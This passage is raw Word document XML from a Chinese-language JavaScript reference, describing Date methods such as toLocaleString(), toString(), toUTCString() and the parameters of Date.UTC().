    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参阅</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Date.toISOString()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>JSON.stringify()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="645" w:name="Date_toLocaleDateString__"/>
      <w:r>
        <w:t>Date.toLocaleDateString()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="645"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>以本地格式的字符串形式返回一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>的日期部分</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>date.toLocaleDateString()</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date</w:t>
      </w:r>
      <w:r>
        <w:t>的日期部分的一个与具体实现相关的、人类可读的字符串表示形式，使用本地时区以及本地习惯格式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参阅</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Date.toDateString()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Date.toLocaleString()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Date.toLocaleTimeString()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Date.toString()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Date.toTimeString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="646" w:name="Date_toLocaleString__"/>
      <w:r>
        <w:t>Date.toLocaleString()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="646"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>转换为一个本地格式的字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>date.toLocaleString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>由</w:t>
      </w:r>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>指定的日期与时间的一个字符串表示形式。日期与时</w:t>
      </w:r>
      <w:r>
        <w:t>间使用本地时区以及本地的习惯表示。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>用法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>toLocaleString()</w:t>
      </w:r>
      <w:r>
        <w:t>使用本地时区，将一个日期转换为一个字符串。这个方法也使用本地习惯来格式化日期及时间，所以在不同的</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>国家或平台上，格式可能会不一样。</w:t>
      </w:r>
      <w:r>
        <w:t>toLocaleString()</w:t>
      </w:r>
      <w:r>
        <w:t>一般返回的是用户首选的日期及时间格式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参阅</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Date.toISOString()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Date.toLocaleDateString()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Date.toLocaleTimeString()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Date.toString()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Date.toUTCString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="647" w:name="Date_toLocaleTimeString__"/>
      <w:r>
        <w:t>Date.toLocaleTimeString()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="647"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回使用本地格式表示的</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>的时间部分</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>date.toLocaleTimeString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个与实现相关的、人类可读的表示</w:t>
      </w:r>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>的时间部分的字符串，使用本地时区以及本地习惯格式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参阅</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Date.toDateString()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Date.toLocaleDateString()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Date.toLocaleString()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Date.toString()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Date.toTimeString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="648" w:name="Date_toString__"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Date.toString()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="648"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>转换为一个字符串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t>date.toString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>的一个人类可读的字符串表示形式，使用本地时区。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>的一个人类可读的、与实现相关的字符串表示形式。和</w:t>
      </w:r>
      <w:r>
        <w:t>toUTCString()</w:t>
      </w:r>
      <w:r>
        <w:t>不同，</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>使用本地时区。与</w:t>
      </w:r>
      <w:r>
        <w:t>toLocaleString()</w:t>
      </w:r>
      <w:r>
        <w:t>不同，</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>可能不使用本地特定的格式来表示日期及时间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参阅</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Date.parse()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Date.toDateString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Date.toISOString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Date.to</w:t>
      </w:r>
      <w:r>
        <w:t>LocaleString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Date.toTimeString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Date.toUTCString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="649" w:name="Date_toTimeString__"/>
      <w:r>
        <w:t>Date.toTimeString()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="649"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>以字符串形式返回一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>的时间部分</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>date.toTimeString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个与实现相关的、人类可读的表示</w:t>
      </w:r>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>的时间部分的字符串，使用本地时区表示。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参阅</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Date.toString()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Date.toDateString()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Date.toLocaleTimeString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="650" w:name="Date_toUTCString__"/>
      <w:r>
        <w:t>Date.toUTCString()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="650"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>转换为字符</w:t>
      </w:r>
      <w:r>
        <w:t>串（全球时间）</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date.toUTCString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>的一个人类可读的以全球时间表示的字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>toUTCString()</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>的以全球时间表示的与实现相关的字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参阅</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Date.toISOString()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Date.toLocaleString()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Date.toString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="651" w:name="Date_UTC__"/>
      <w:r>
        <w:t>Date.UTC()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="651"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>说明转为毫秒形式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Date.UTC(year,month,day,hours,minutes,seconds,ms)</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year</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>以</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>位数格式表示的年份。如果这个参数在</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>99</w:t>
      </w:r>
      <w:r>
        <w:t>之间（包括</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>99</w:t>
      </w:r>
      <w:r>
        <w:t>），则它将加上</w:t>
      </w:r>
      <w:r>
        <w:t>1900</w:t>
      </w:r>
      <w:r>
        <w:t>，当做</w:t>
      </w:r>
      <w:r>
        <w:t>1900</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>1999</w:t>
      </w:r>
      <w:r>
        <w:t>之间的年份处理。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>month</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>月份，指定为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>月）～</w:t>
      </w:r>
      <w:r>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:t>月）之间的一个整数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>day</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对应月中的日期值，指定为</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>31</w:t>
      </w:r>
      <w:r>
        <w:t>之间的一个整数。注意这个参数的最小值为</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>，而其他参数的最小值是</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>。这个参数是可选的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>hours</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>小时，指定为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>（午夜）～</w:t>
      </w:r>
      <w:r>
        <w:t>23</w:t>
      </w:r>
      <w:r>
        <w:t>（晚上</w:t>
      </w:r>
      <w:r>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:t>点）之间的一个整数。这个参数是可选的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>minutes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>小时中的分钟值，指定为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>59</w:t>
      </w:r>
      <w:r>
        <w:t>之间的一个整数。这个参数是可选的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>seconds</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>分钟中的秒钟值，指定为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>59</w:t>
      </w:r>
      <w:r>
        <w:t>之间的一个整数。这个参数是可选的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ms</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
